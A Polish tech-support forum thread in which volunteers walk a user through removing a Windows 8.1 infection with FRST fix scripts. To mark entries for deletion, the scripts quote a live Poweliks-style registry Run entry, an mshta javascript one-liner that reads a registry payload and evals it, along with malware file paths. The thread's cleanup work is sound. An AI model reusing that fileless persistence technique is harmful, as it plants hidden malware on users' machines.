groovey Opublikowano 19 Czerwca 2015 Zgłoś Udostępnij Opublikowano 19 Czerwca 2015 Witam, nie wiem, czy sprostam wymogom: od kilku dni Windows Defender pokazuje mi trojany i malware. Wyskakuje również alert o win32/gamarue a zastosowanie narzędzi windows 8 nic nie daje. Zgodnie z Pani zaleceniem zrobiłem testy i załączam: http://wklej.org/id/1742285/ http://wklej.org/id/1742287/ http://wklej.org/id/1742288/ http://wklej.org/id/1742289/ będę zobowiązany za pomoc z Pani strony. Odnośnik do komentarza
jessica Opublikowano 19 Czerwca 2015 Zgłoś Udostępnij Opublikowano 19 Czerwca 2015 https://www.fixitpc.pl/topic/27096-nowy-moderator-w-dziale-malware/ Nie wiem, kiedy @Picasso lub @Naathim zacznie pomagać. Ja już dziś nie mam czasu, ale możesz zrobić jeszcze dwie rzeczy: 1) zrob log z USBFix z opcji LISTING https://www.fixitpc.pl/topic/8-dezynfekcja-zbior-narzedzi-usuwajacych/?do=findComment&comment=74 2) zrób log z Adw-Cleaner https://www.fixitpc.pl/topic/8-dezynfekcja-zbior-narzedzi-usuwajacych/?do=findComment&comment=118323 jessi Odnośnik do komentarza
groovey Opublikowano 19 Czerwca 2015 Autor Zgłoś Udostępnij Opublikowano 19 Czerwca 2015 usbfix http://wklej.org/id/1742385/ adwcleaner http://wklej.org/id/1742382/ thks in advance Odnośnik do komentarza
jessica Opublikowano 20 Czerwca 2015 Zgłoś Udostępnij Opublikowano 20 Czerwca 2015 USBFix: na "E" nie masz nic, więc nie masz też infekcji GAMARUE. Adw-Cleaner: najpierw kliknij na SZUKAJ (SCAN), a dopiero po zakończeniu skanowania, gdy uaktywni się przycisk USUŃ (CLEANING), to kliknij na niego. Process C:\Users\Cezary\AppData\Roaming\Microsoft\Protect\conhost.exe (*** suspicious ***) Sprawdź ten plik na --> JOTTI/ albo na VIRUSTOTAL (Plik o takiej nazwie chyba powinien być w innej lokalizacji, a nie w tej). Zrób nowe logi FRST - już bez Shortcut. jessi Odnośnik do komentarza
groovey Opublikowano 23 Czerwca 2015 Autor Zgłoś Udostępnij Opublikowano 23 Czerwca 2015 zrobiłem nowy adwcleaner http://wklej.org/id/1744907/ a to są nowe frst http://wklej.org/id/1744906/ i addition http://wklej.org/id/1744905/ ckc Odnośnik do komentarza
jessica Opublikowano 23 Czerwca 2015 Zgłoś Udostępnij Opublikowano 23 Czerwca 2015 Otwórz Notatnik i wklej w nim: HKU\S-1-5-21-669934448-3564392166-1087876309-1001\...\Run: [bparse] => C:\Users\Cezary\AppData\Roaming\WinKun\winkun.exe [106834 2015-06-22] ()C:\Users\Cezary\AppData\Roaming\WinKunHKU\S-1-5-21-669934448-3564392166-1087876309-1001\...\Run: [{B207AD06-2E17-B7AE-DDC4-9BEB3C8557B4}] => C:\ProgramData\Microsoft\Performance\Monitor\temp\tmpD71D.exe <===== ATTENTIONC:\ProgramData\Microsoft\Performance\Monitor\temp\tmpD71D.exeCHR HKLM\SOFTWARE\Policies\Google: Policy restriction <======= ATTENTIONCHR HKU\S-1-5-21-669934448-3564392166-1087876309-1001\SOFTWARE\Policies\Google: Policy restriction <======= ATTENTIONHKLM\SOFTWARE\Policies\Microsoft\Internet Explorer: Policy restriction <======= ATTENTIONFF Plugin-x32: @tencent.com/npQQMailWebKit,version=1.0.0.1 -> C:\Program Files (x86)\QQMailPlugin\npQQMailWebKit.dll [2013-04-25] (Tencent)FF Plugin-x32: @tencent.com/nptxftnWebKit,version=1.0.0.1 -> C:\Program Files (x86)\QQMailPlugin\nptxftnWebKit.dll [2013-04-08] (Tencent Technology (Shenzhen) Company Limited)C:\ProgramData\SetStretch.exeReg: reg delete "HKU\.DEFAULT\Software\Microsoft\Internet Explorer\SearchScopes" /fReg: reg delete "HKU\S-1-5-19\Software\Microsoft\Internet Explorer\SearchScopes" /fReg: reg delete "HKU\S-1-5-20\Software\Microsoft\Internet Explorer\SearchScopes" /fEmptyTemp: Plik zapisz pod nazwą fixlist.txt i umieść obok FRST.exeUruchom FRST i kliknij przycisk Fix.Powstanie plik fixlog.txt.Daj ten log. Czy dalej wykrywany jest GAMARUE? jessi Odnośnik do komentarza
groovey Opublikowano 23 Czerwca 2015 Autor Zgłoś Udostępnij Opublikowano 23 Czerwca 2015 aż się boję, że zadziała. fixlog http://wklej.org/id/1745025/ szukam Gamarue Odnośnik do komentarza
groovey Opublikowano 23 Czerwca 2015 Autor Zgłoś Udostępnij Opublikowano 23 Czerwca 2015 Action Center WIN 8.1 64-bit okazuje mi jeden problem, ale z 6 datami w następujący sposób: http://wklej.org/id/1745040/ nie wiem co to znaczy. Odnośnik do komentarza
jessica Opublikowano 24 Czerwca 2015 Zgłoś Udostępnij Opublikowano 24 Czerwca 2015 Action Center WIN 8.1 64-bit okazuje mi jeden problem, ale z 6 datami w następujący sposób: http://wklej.org/id/1745040/ nie wiem co to znaczy. prawdę mówiąc - ja też nie wiem. Jeszcze jedno przeoczyłam w logach: Otwórz Notatnik i wklej w nim: HKU\S-1-5-21-669934448-3564392166-1087876309-1001\...\Run: [**a40298fb<*>] => mshta javascript:joLAa8mI="ckNa";s5C=new%20ActiveXObject("WScript.Shell");cat9SDS="lkCtOxBnB";EX8zw=s5C.RegRead("HKCU\\software\\c17946de\\bdcff458");L7o4EKNG="y";eval(EX8zw);EhtnPXXk7="Jc"; <===== ATTENTION (Value Name with invalid characters)EmptyTemp: Plik zapisz pod nazwą fixlist.txt i umieść obok FRST.exe Uruchom FRST i kliknij przycisk Fix. Powstanie plik fixlog.txt. Daj ten log. jessi Odnośnik do komentarza
groovey Opublikowano 24 Czerwca 2015 Autor Zgłoś Udostępnij Opublikowano 24 Czerwca 2015 po puszczeniu frst dzisiaj: http://wklej.org/id/1745290/ Odnośnik do komentarza
jessica Opublikowano 24 Czerwca 2015 Zgłoś Udostępnij Opublikowano 24 Czerwca 2015 to stary fixlog Odnośnik do komentarza
groovey Opublikowano 24 Czerwca 2015 Autor Zgłoś Udostępnij Opublikowano 24 Czerwca 2015 poprawiam: http://wklej.org/id/1745666/ i bardzo przepraszam za nieprzypilnowanie Odnośnik do komentarza
groovey Opublikowano 26 Czerwca 2015 Autor Zgłoś Udostępnij Opublikowano 26 Czerwca 2015 Jessica, Chcę Ci serdecznie podziękować. Po dwóch dniach męczenia kompa i zainstalowaniu jeszcze Comodo, nic się nie dzieje, nic nie wykrywa, mam spokój. Comodo wykrył jednego malware'a i zajął się nim. Stare problemy znikły. Dziękuję bardzo, Czarek Odnośnik do komentarza
jessica Opublikowano 26 Czerwca 2015 Zgłoś Udostępnij Opublikowano 26 Czerwca 2015 Otwórz Notatnik i wklej w nim: C:\Users\Cezary\AppData\Roaming\Microsoft\Protect\conhost.exeHKU\S-1-5-21-669934448-3564392166-1087876309-1001\...\Run: [Console Protect Service] => C:\Users\Cezary\AppData\Roaming\Microsoft\Protect\conhost.exe [184962 2015-06-18] ()EmptyTemp: Plik zapisz pod nazwą fixlist.txt i umieść obok FRST.exeUruchom FRST i kliknij przycisk Fix.Powstanie plik fixlog.txt.Daj ten log. Zrób to. o ile nie usunął już tego Comodo. jessi Odnośnik do komentarza
picasso Opublikowano 26 Czerwca 2015 Zgłoś Udostępnij Opublikowano 26 Czerwca 2015 groovey, poproszę o ponowny log z FRST (włącznie z Addition). Odnośnik do komentarza
groovey Opublikowano 27 Czerwca 2015 Autor Zgłoś Udostępnij Opublikowano 27 Czerwca 2015 Jessi dla Ciebie: http://www.wklejto.pl/229367 Odnośnik do komentarza
groovey Opublikowano 27 Czerwca 2015 Autor Zgłoś Udostępnij Opublikowano 27 Czerwca 2015 Pani Profesor Picasso, to dla mnie zaszczyt... (bez sarkazmu) logi z FRST z additional addition bez shortcut http://www.wklejto.pl/229368 i adds http://www.wklejto.pl/229369 myślę, że to legalne i za zaangażowanie chciałbym Szanownym Paniom podziękować: http://www.wklejto.pl/229370 i może jeszcze tak: nawiązując do Pań wpisów na forum. Odnośnik do komentarza
picasso Opublikowano 29 Czerwca 2015 Zgłoś Udostępnij Opublikowano 29 Czerwca 2015 Proszę trzymaj się poprzedniego serwisu wklej.org, jeśli logi są doczepiane nie przez załączniki forum (ale preferuję załączniki forum). Serwis wklejto nie jest dobry, zniekształca kodowanie raportów (specjalne znaki Unicode są zmienione i już nieprzetwarzalne przez FRST). Co widać w raportach: 1. Problem infekcji w ogóle nie rozwiązany - infekcja grasuje na dobre - m.in. Sathurbot w ShellIconOverlayIdentifiers i coś co wygląda na wariant infekcji w rodzaju Poweliks / Xswkit. Prócz tego, jest też adware w Firefox. 2. Druga sprawa - szykuje się też problem sprzętowy i będzie potem analizowany z osobna w innym dziale (Hardware). Dziennik zdarzeń notuje bad sektory dysku: System errors: ============= Error: (06/23/2015 08:30:08 PM) (Source: disk) (EventID: 7) (User: ) Description: The device, \Device\Harddisk0\DR0, has a bad block. Wstępne akcje do wdrożenia pod kątem infekcji: 1. Otwórz Notatnik i wklej w nim: CloseProcesses: (Microsoft Corporation) C:\Windows\explorer.exe ShellIconOverlayIdentifiers: [0PerformanceMonitor] -> {3B5B973C-92A4-4855-9D3F-0F3D23332208} => C:\ProgramData\Microsoft\Performance\Monitor\PerformanceMonitor.dll [2015-05-09] () HKU\S-1-5-21-669934448-3564392166-1087876309-1001\...\Run: [{B207AD06-2E17-B7AE-DDC4-9BEB3C8557B4}] => C:\ProgramData\Microsoft\Performance\Monitor\temp\tmpC443.exe [147456 2015-06-26] (Spazio irradiato) HKU\S-1-5-21-669934448-3564392166-1087876309-1001\...\Run: [**a40298fb] => mshta javascript:joLAa8mI="ckNa";s5C=new%20ActiveXObject("WScript.Shell");cat9SDS="lkCtOxBnB";EX8zw=s5C.RegRead("HKCU\\software\\c17946de\\bdcff458");L7o4EKNG="y";eval(EX8zw);EhtnPXXk7="Jc"; HKU\S-1-5-21-669934448-3564392166-1087876309-1001\...\Run: [Ewption] => C:\Users\Cezary\AppData\Local\Ewption\tmpC443.exe [147456 2015-06-26] (Spazio irradiato) HKU\S-1-5-21-669934448-3564392166-1087876309-1001\...\Run: [ProxyGate] => C:\Users\Cezary\AppData\Roaming\ProxyGate\MainService.exe R0 3C325EAB; C:\Windows\System32\drivers\3C325EAB.sys [457824 2015-05-09] (Kaspersky Lab ZAO) HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\3C325EAB.sys => ""="Driver" HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\3C325EAB.sys => ""="Driver" Task: {6B3467E3-0E13-4B8A-AE31-7838931C70D5} - System32\Tasks\AutoKMS => C:\Windows\AutoKMS\AutoKMS.exe Task: {A865DAAC-2E82-4E94-957E-9E9D996EF901} - System32\Tasks\{DB176E6A-E593-4BAF-A38D-E965F38CEB05} => pcalua.exe -a "C:\Users\Cezary\AppData\Roaming\Any Send Packages\uninstaller.exe" -c /Uninstall /NM="Any Send Packages" /AN="" /MBN="Any Send Packages" Task: {A9C6DEB1-C97C-4240-8EC2-71AE96E633BC} - System32\Tasks\ASUS Live Update2 => C:\Program Files (x86) [2015-06-24] () Task: {AF859B7D-8A89-4CDE-8582-3AEBD22BC8D5} - System32\Tasks\{7EA6F83A-7028-4153-B8F4-2A074365744C} => pcalua.exe -a C:\Users\Cezary\AppData\Local\Microsoft\SkyDrive\16.4.6013.0910\SkyDriveSetup.exe -c /uninstall Task: {B22EB681-CDB3-4B9D-8ADC-7052995D9949} - System32\Tasks\AutoKMSDaily => C:\Windows\AutoKMS\AutoKMS.exe Task: {C99E0E80-BB4B-4F67-A840-98209D263A83} - System32\Tasks\{B9260C24-276A-44BF-A844-BC40E35A8BFD} => pcalua.exe -a "C:\Program Files (x86)\Microsoft Silverlight\5.1.10411.0\Silverlight.Configuration.exe" -c -uninstallApp 2765766442.portal.qtrax.com Task: {EC54CC44-8812-42C0-8DEC-AE05D6FAAC70} - System32\Tasks\{999C1430-8EBE-4118-8C1B-69F4AF905631} => pcalua.exe -a "C:\Program Files (x86)\Microsoft Silverlight\5.1.20125.0\Silverlight.Configuration.exe" -c -uninstallApp 2765766442.portal.qtrax.com Task: {FDD60CF7-5388-4CE0-BF63-947E38D88B77} - System32\Tasks\ASUS Live Update1 => C:\Program Files (x86) [2015-06-24] () Task: C:\WINDOWS\Tasks\AutoKMS.job => C:\Windows\AutoKMS\AutoKMS.exe Task: C:\WINDOWS\Tasks\AutoKMSDaily.job => C:\Windows\AutoKMS\AutoKMS.exe CustomCLSID: HKU\S-1-5-21-669934448-3564392166-1087876309-1001_Classes\CLSID\{0F22A205-CFB0-4679-8499-A6F44A80A208}\InprocServer32 -> C:\Users\Cezary\AppData\Local\Google\Update\1.3.25.5\psuser_64.dll No File CustomCLSID: HKU\S-1-5-21-669934448-3564392166-1087876309-1001_Classes\CLSID\{355EC88A-02E2-4547-9DEE-F87426484BD1}\InprocServer32 -> C:\Users\Cezary\AppData\Local\Google\Update\1.3.23.9\psuser_64.dll No File CustomCLSID: HKU\S-1-5-21-669934448-3564392166-1087876309-1001_Classes\CLSID\{90B3DFBF-AF6A-4EA0-8899-F332194690F8}\InprocServer32 -> C:\Users\Cezary\AppData\Local\Google\Update\1.3.24.15\psuser_64.dll No File CustomCLSID: HKU\S-1-5-21-669934448-3564392166-1087876309-1001_Classes\CLSID\{C3BC25C0-FCD3-4F01-AFDD-41373F017C9A}\InprocServer32 -> C:\Users\Cezary\AppData\Local\Google\Update\1.3.26.9\psuser_64.dll No File CustomCLSID: HKU\S-1-5-21-669934448-3564392166-1087876309-1001_Classes\CLSID\{D0336C0B-7919-4C04-8CCE-2EBAE2ECE8C9}\InprocServer32 -> C:\Users\Cezary\AppData\Local\Google\Update\1.3.25.11\psuser_64.dll No File CustomCLSID: HKU\S-1-5-21-669934448-3564392166-1087876309-1001_Classes\CLSID\{FE498BAB-CB4C-4F88-AC3F-3641AAAF5E9E}\InprocServer32 -> C:\Users\Cezary\AppData\Local\Google\Update\1.3.24.7\psuser_64.dll No File HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = http://www.msn.com/?pc=MSE1 HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Start Page = http://www.msn.com/?pc=MSE1 HKLM\Software\Microsoft\Internet Explorer\Main,Search Page = http://www.google.com HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Search Page = http://www.google.com HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = about:blank HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Page_URL = about:blank HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = http://www.google.com HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Search_URL = http://www.google.com SearchScopes: HKU\S-1-5-21-669934448-3564392166-1087876309-1001 -> {69ABAE4C-47BC-4EAD-A2B3-ED08ED617830} URL = http://www.bing.com/search?q={searchTerms}&form=MSSEDF&pc=MSE1 SearchScopes: HKU\S-1-5-21-669934448-3564392166-1087876309-1001 -> {80c554b9-c7f8-4a21-9471-06d606da78a2} URL = http://www.bing.com/search?q={searchTerms}&form=MSSEDF&pc=MSE1 FF HKLM-x32\...\Thunderbird\Extensions: [msktbird@mcafee.com] - C:\Program Files\McAfee\MSK FF Plugin-x32: @qq.com/QQPhotoDrawEx -> C:\Program Files (x86)\Tencent\Qzone\Ver_247.312\npQQPhotoDrawEx.dll No File FF HKU\S-1-5-21-669934448-3564392166-1087876309-1001\...\Firefox\Extensions: [speedtest4354@BestOffers] - C:\Users\Cezary\AppData\Roaming\Mozilla\Extensions\speedtest4354@BestOffers FF Extension: Speed Test 127 - C:\Users\Cezary\AppData\Roaming\Mozilla\Extensions\speedtest4354@BestOffers [2014-02-03] C:\Program Files (x86)\QQMailPlugin C:\ProgramData\2320303d353737_c C:\ProgramData\@system.temp C:\ProgramData\@system3.att C:\ProgramData\Microsoft\Performance C:\ProgramData\TEMP C:\Users\Cezary\AppData\Local\Ewption C:\Users\Cezary\AppData\Roaming\麽鎒駓覜 C:\Users\Cezary\AppData\Roaming\my_intel.sys C:\Users\Cezary\AppData\Roaming\sp_data.sys C:\Users\Cezary\AppData\Roaming\ChromeUpdate C:\Users\Cezary\AppData\Roaming\ProxyGate C:\Windows\System32\drivers\3C325EAB.sys C:\WINDOWS\SysWOW64\029B560A371F4E00AB32838EBC01B9E7 DeleteKey: HKCU\Software\c17946de DeleteKey: HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\mountpoints2 DeleteKey: HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run CMD: netsh advfirewall reset CMD: dir /a C:\Users\Cezary\AppData\Roaming\Chromodo Adnotacja dla innych czytających: skrypt unikatowy - dopasowany tylko i wyłącznie pod ten system, proszę nie stosować na swoich systemach. Z menu Notatnika > Plik > Zapisz jako > wprowadź nazwę fixlist.txt > Kodowanie zmień na UTF-8 Plik fixlist.txt umieść obok narzędzia FRST. Przejdź w Tryb awaryjny Windows, by ani infekcja ani COMODO nie zablokowały FRST. Uruchom FRST i kliknij w Fix. Gdy Fix ukończy pracę, nastąpi restart, opuść Tryb awaryjny. W tym samym katalogu skąd uruchamiano FRST powstanie plik fixlog.txt. 2. Przez Panel sterowania odinstaluj sponsorowany zbędnik McAfee Security Scan Plus. jeśli nie używasz, pozbądź się też Skype Click to Call. 3. Wyczyść Firefox: menu Pomoc > Informacje dla pomocy technicznej > Odśwież program Firefox. Zakładki i hasła nie zostaną naruszone. menu Historia > Wyczyść historię przeglądania 4. Zrób nowe logi: FRST z opcji Scan (z Addition) oraz Farbar Service Scanner. Dołącz też plik fixlog.txt. Wszystkie logi proszę załącz w formie oryginalnej, tzn. jako załączniki forum a nie na serwisach wklejkowych. Odnośnik do komentarza
groovey Opublikowano 29 Czerwca 2015 Autor Zgłoś Udostępnij Opublikowano 29 Czerwca 2015 jak to bywa często optymizm był, a wyszło jak zwykle. pozdr picasso z szacunkiem. Czarek FRST.txt Addition.txt Fixlog.txt FSS.txt Odnośnik do komentarza
picasso Opublikowano 29 Czerwca 2015 Zgłoś Udostępnij Opublikowano 29 Czerwca 2015 Infekcja wstępnie usunięta. Poprawki: 1. W związku z obecnością infekcji bezplikowej typu Poweliks / Xswkit zachodzi podejrzenie, że są zmodyfikowane określone ustawienia przeglądarki IE. Wykonaj reset także i tej przeglądarki: Opcje internetowe > Zaawansowane > Resetuj. 2. Klawisz z flagą Windows + X > Wiersz polecenia (Administrator) > wklej komendę i ENTER: sfc /scannow Gdy komenda ukończy działanie: 3. Odinstaluj USBFix. Otwórz Notatnik i wklej w nim: CloseProcesses: CreateRestorePoint: HKLM\...\Run: [DptfPolicyLpmServiceHelper] => C:\WINDOWS\system32\DptfPolicyLpmServiceHelper.exe RemoveDirectory: C:\AdwCleaner RemoveDirectory: C:\FRST\Quarantine RemoveDirectory: C:\UsbFix RemoveDirectory: C:\Users\Cezary\Desktop\Stare dane programu Firefox RemoveDirectory: C:\Windows\AutoKMS CMD: netsh advfirewall reset CMD: del /q C:\Users\Cezary\Downloads\adwcleaner*.exe CMD: del /q C:\Users\Cezary\Downloads\UsbFix_2015_7.959.exe CMD: del /q C:\Users\Cezary\Downloads\zf49b930.exe CMD: findstr /c:"[sR]" %windir%\logs\cbs\cbs.log EmptyTemp: Plik zapisz pod nazwą fixlist.txt i umieść obok narzędzia FRST. Tym razewm nie wchodź do Trybu awaryjnego, lecz wyłącz COMODO na czas akcji z FRST. Uruchom FRST i kliknij w Fix. Czekaj cierpliwie, nie przerywaj działania. Ma nastąpić restart systemu i powstać kolejny fixlog.txt. Przedstaw ten log. PS. Jeśli nikt jeszcze nie odpisał, a chcesz uzupełnić post, stosuj funkcję Edytuj zamiast pisać post pod postem. Dwa posty powyżej skleiłam. Odnośnik do komentarza
groovey Opublikowano 29 Czerwca 2015 Autor Zgłoś Udostępnij Opublikowano 29 Czerwca 2015 zrobiłem wg, z poruszaniem się po forum zbieram doświadczenie. command wskazał mi plik, w którym są jakieś informacje o błędach. Czy mam go tez załączyć? Fixlog.txt Odnośnik do komentarza
picasso Opublikowano 29 Czerwca 2015 Zgłoś Udostępnij Opublikowano 29 Czerwca 2015 Kolejne czynności pod kątem usuwania infekcji: 1. Usuń używane narzędzia za pomocą DelFix. 2. Wykonaj skany za pomocą Hitman Pro oraz Malwarebytes Anti-Malware. Nic nie usuwaj, dostarcz tylko raporty skanerów. command wskazał mi plik, w którym są jakieś informacje o błędach. Czy mam go tez załączyć? Wyniki sfc zostały wydrukowane w skrypcie FRST za pomocą komendy CMD: findstr /c:"[sR]" %windir%\logs\cbs\cbs.log. Narzędzie notuje następujące nienaprawialne uszkodzenia: 2015-06-29 21:19:23, Info CSI 000008e2 [sR] Cannot repair member file [l:24{12}]"utc.app.json" of Microsoft-Windows-Unified-Telemetry-Client, Version = 6.3.9600.17842, pA = PROCESSOR_ARCHITECTURE_AMD64 (9), Culture neutral, VersionScope = 1 nonSxS, PublicKeyToken = {l:8 b:31bf3856ad364e35}, Type neutral, TypeName neutral, PublicKey neutral in the store, hash mismatch 2015-06-29 21:19:23, Info CSI 000008e4 [sR] Cannot repair member file [l:66{33}]"telemetry.ASM-WindowsDefault.json" of Microsoft-Windows-Unified-Telemetry-Client, Version = 6.3.9600.17842, pA = PROCESSOR_ARCHITECTURE_AMD64 (9), Culture neutral, VersionScope = 1 nonSxS, PublicKeyToken = {l:8 b:31bf3856ad364e35}, Type neutral, TypeName neutral, PublicKey neutral in the store, hash mismatch 2015-06-29 21:19:23, Info CSI 000008e6 [sR] Cannot repair member file [l:34{17}]"I386\STDSCHMX.GDL" of ntprint.inf, Version = 6.3.9600.17415, pA = PROCESSOR_ARCHITECTURE_INTEL (0), Culture neutral, VersionScope = 1 nonSxS, PublicKeyToken = {l:8 b:31bf3856ad364e35}, Type = [l:24{12}]"driverUpdate", TypeName neutral, PublicKey neutral in the store, hash mismatch 2015-06-29 21:19:23, Info CSI 000008e8 [sR] Cannot repair member file [l:34{17}]"I386\STDSCHMX.GDL" of ntprint.inf, Version = 6.3.9600.17415, pA = PROCESSOR_ARCHITECTURE_INTEL (0), Culture neutral, VersionScope = 1 nonSxS, PublicKeyToken = {l:8 b:31bf3856ad364e35}, Type = [l:24{12}]"driverUpdate", TypeName neutral, PublicKey neutral in the store, hash mismatch 2015-06-29 21:19:23, Info CSI 000008e9 [sR] This component was referenced by [l:164{82}]"Package_706_for_KB3000850~31bf3856ad364e35~amd64~~6.3.1.8.3000850-1750_neutral_GDR" 2015-06-29 21:19:23, Info CSI 000008eb [sR] Cannot repair member file [l:24{12}]"utc.app.json" of Microsoft-Windows-Unified-Telemetry-Client, Version = 6.3.9600.17842, pA = PROCESSOR_ARCHITECTURE_AMD64 (9), Culture neutral, VersionScope = 1 nonSxS, PublicKeyToken = {l:8 b:31bf3856ad364e35}, Type neutral, TypeName neutral, PublicKey neutral in the store, hash mismatch 2015-06-29 21:19:23, Info CSI 000008ec [sR] This component was referenced by [l:154{77}]"Package_1_for_KB3068708~31bf3856ad364e35~amd64~~6.3.1.0.3068708-1_neutral_GDR" 2015-06-29 21:19:23, Info CSI 000008ee [sR] Cannot repair member file [l:66{33}]"telemetry.ASM-WindowsDefault.json" of Microsoft-Windows-Unified-Telemetry-Client, Version = 6.3.9600.17842, pA = PROCESSOR_ARCHITECTURE_AMD64 (9), Culture neutral, VersionScope = 1 nonSxS, PublicKeyToken = {l:8 b:31bf3856ad364e35}, Type neutral, TypeName neutral, PublicKey neutral in the store, hash mismatch 2015-06-29 21:19:23, Info CSI 000008ef [sR] This component was referenced by [l:154{77}]"Package_1_for_KB3068708~31bf3856ad364e35~amd64~~6.3.1.0.3068708-1_neutral_GDR" Prawdopodobnie są to skutki złych bloków dysku. Na razie wątek zostawiam, gdyż: - Te wyniki nie wyglądają na krytyczne. - Bez podmiany plikami dostarczonymi przeze mnie z mojego systemu Windows 8.1 x64 i tak nie ma jak tego naprawić. Musi być identyczna suma MD5 zgodna z wersją komponentu, tu nie przejdzie podmiana plikiem o takiej samej nazwie. - Nie wiadomo co wykaże diagnostyka sprzętowa dysku - może się i tak szykować reinstalacja Windows. Odnośnik do komentarza
groovey Opublikowano 1 Lipca 2015 Autor Zgłoś Udostępnij Opublikowano 1 Lipca 2015 przy Hitman pro chyba coś pokićkałem. Wcisnąłem niestety next i mi za pierwszym razem naprawił błędy. wklejam plik z drugiego puszczenia. DelFix.txt HitmanPro_20150701_1115.txt anti-malware scan.txt Odnośnik do komentarza
groovey Opublikowano 2 Lipca 2015 Autor Zgłoś Udostępnij Opublikowano 2 Lipca 2015 Scan antimalware na automacie z dnia dzisiejszego. nie usuwałem nic. anti-malware scan 2 next day.txt Odnośnik do komentarza
picasso Opublikowano 2 Lipca 2015 Zgłoś Udostępnij Opublikowano 2 Lipca 2015 1. Skanery wykryły tylko drobnostki, tzn: Ciastka w Google Chrome (Hitman) oraz szczątki adware (MBAM). To czego jeszcze nie usunąłeś programami, dokasuj. 2. Wyczyść foldery Przywracania systemu: KLIK. 3. Były różne infekcje. Na wszelki wypadek zmień wszystkie hasła logowania w serwisach (np. bank, poczta). 4. Proponuję też od razu zabezpieczyć cenne dane z dysku C, na którym są wykryte złe bloki, na zewnętrznym nośniku. Następnie udaj się do działu Hardware, załóż tam temat z wymaganymi danymi: KLIK. Zlinkuj im tu do mojego posta wskazującego odczyt złych bloków, by była wiadoma geneza tematu: KLIK. Odnośnik do komentarza
Rekomendowane odpowiedzi